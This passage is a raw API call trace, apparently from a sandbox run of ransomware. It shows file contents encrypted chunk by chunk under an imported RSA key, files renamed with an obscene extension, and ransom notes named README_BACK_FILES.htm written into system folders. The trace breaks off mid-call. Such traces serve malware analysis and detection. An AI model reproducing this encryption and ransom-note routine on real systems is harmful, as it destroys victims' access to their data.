CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0236.962] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28328c8) returned 1 [0236.963] CryptImportPublicKeyInfo (in: hCryptProv=0x28328c8, dwCertEncodingType=0x1, pInfo=0x283a798*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283a7c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283a7d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28171d8) returned 1 [0236.963] CryptEncrypt (in: hKey=0x28171d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0236.963] CryptEncrypt (in: hKey=0x28171d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28327b8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28327b8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0236.966] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28327b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.966] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.977] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.977] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.977] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.978] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.978] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.978] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.978] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.978] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.978] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.978] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.978] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.978] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.978] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.978] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.978] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.978] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.979] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.979] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.979] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.979] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.979] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.979] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.979] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.979] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.979] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.979] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.979] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.979] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.979] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.979] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.979] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.979] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.979] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.979] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.979] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.979] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.979] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.980] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.980] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.980] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.980] ReadFile (in: hFile=0x5d10, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8*, lpNumberOfBytesRead=0x2b9e074*=0x27c, lpOverlapped=0x0) returned 1 [0236.980] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x27c, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9e074*=0x280) returned 1 [0236.980] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.980] CloseHandle (hObject=0x5d10) returned 1 [0236.980] CloseHandle (hObject=0xffffffff) returned 1 [0236.980] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL.gsg" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), bFailIfExists=0) returned 0 [0236.980] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL", dwFileAttributes=0x0) returned 1 [0236.981] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL.gsg" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.gsg")) returned 0 [0236.981] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL.fuck" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.fuck")) returned 0 [0236.982] CryptDestroyHash (hHash=0x2817298) returned 1 [0236.983] CryptDestroyKey (hKey=0x2817458) returned 1 [0236.983] CryptReleaseContext (hProv=0x28326a8, dwFlags=0x0) returned 1 [0236.983] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.983] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0236.983] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\mf\\readme_back_files.htm")) returned 0xffffffff [0236.983] AreFileApisANSI () returned 1 [0236.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd028, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0236.983] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\mf\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.983] GetLastError () returned 0x5 [0236.983] GetLastError () returned 0x5 [0236.984] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.984] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\NetFramework\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817298 [0236.984] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.984] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.984] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817098 [0236.984] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.984] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.984] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0236.984] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\readme_back_files.htm")) returned 0xffffffff [0236.985] AreFileApisANSI () returned 1 [0236.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0236.985] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\netframework\\breadcrumbstore\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0236.986] GetFileType (hFile=0x5d10) returned 0x1 [0236.986] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9db8c, lpOverlapped=0x0 | out: lpBuffer=0x2b9db94*, lpNumberOfBytesWritten=0x2b9db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0236.987] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.987] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0236.987] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\NetFramework\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\netframework\\readme_back_files.htm")) returned 0xffffffff [0236.987] AreFileApisANSI () returned 1 [0236.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0236.987] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\NetFramework\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\netframework\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.988] GetLastError () returned 0x5 [0236.988] GetLastError () returned 0x5 [0236.988] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.988] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2816f58 [0236.988] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.988] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.988] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817098 [0236.988] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.988] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.989] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0236.989] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\Connections\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\network\\connections\\readme_back_files.htm")) returned 0xffffffff [0236.989] AreFileApisANSI () returned 1 [0236.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f7088, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0236.989] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\Connections\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\network\\connections\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.989] GetLastError () returned 0x5 [0236.989] GetLastError () returned 0x5 [0236.989] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.989] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\Downloader\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0xffffffff [0236.989] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\Downloader\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\readme_back_files.htm")) returned 0xffffffff [0236.990] AreFileApisANSI () returned 1 [0236.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6a58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0236.990] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\Downloader\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.990] GetLastError () returned 0x5 [0236.990] GetLastError () returned 0x5 [0236.990] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.990] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0236.990] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\network\\readme_back_files.htm")) returned 0xffffffff [0236.990] AreFileApisANSI () returned 1 [0236.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ccfe0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0236.990] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Network\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\network\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.991] GetLastError () returned 0x5 [0236.991] GetLastError () returned 0x5 [0236.991] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.991] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Office\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817098 [0236.991] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.991] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.991] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.991] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0236.991] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Office\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\office\\readme_back_files.htm")) returned 0xffffffff [0236.992] AreFileApisANSI () returned 1 [0236.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd610, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0236.992] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Office\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\office\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.992] GetLastError () returned 0x5 [0236.992] GetLastError () returned 0x5 [0236.992] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.992] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2816f58 [0236.994] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.994] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.994] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0236.994] GetLastError () returned 0x5 [0236.994] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml")) returned 0x20 [0236.995] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml", dwFileAttributes=0x80) returned 0 [0236.996] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml" 